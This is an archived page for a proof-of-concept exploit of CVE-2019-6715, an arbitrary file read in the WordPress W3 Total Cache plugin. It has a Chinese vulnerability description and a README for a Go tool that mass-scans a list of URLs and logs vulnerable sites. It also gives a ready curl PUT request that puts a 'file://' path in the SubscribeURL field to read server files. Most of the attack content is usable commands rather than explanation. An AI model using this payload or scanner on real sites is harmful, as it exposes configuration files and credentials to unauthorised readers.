CVE-2019-6715 PoC — WordPress W3 Total Cache插件信息泄露漏洞

Source

https://github.com/random-robbie/cve-2019-6715

Associated Vulnerability

Title:WordPress W3 Total Cache插件信息泄露漏洞 (CVE-2019-6715)
Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。W3 Total Cache plugin是使用在其中的一个SEO（搜索引擎优化）插件。 WordPress W3 Total Cache插件0.9.4之前版本中的pub/sns.php文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。

Readme

# cve-2019-6715

### Shout out to TomNomNom for 99.9% of his code....

### Build

```
go get github.com/fatih/color
go build
```

### Usage

```
cat list.txt | ./2019-6715
```

All vuln urls are logged in text.log


CVE 2019-6715
---

Description: pub/sns.php in the W3 Total Cache plugin before 0.9.4 for WordPress allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data.

Vulnerability Type: arbitrary file read

Vendor of Product: Wordpress W3 Total Cache plugin by Frederick Townes

Affected Product Code Base: W3 Total Cache - 0.9.2.6 - 0.9.3, fixed in 0.9.4

Affected Component: Affected source code file: w3-total-cache/pub/sns.php

Exploit - PoC:
---


```
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php
```

File Snapshot


 [4.0K]  /data/pocs/d72ec9453e234fbf19817374b069362dcee74d8e
├── [2.5K]  main.go
└── [1020]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!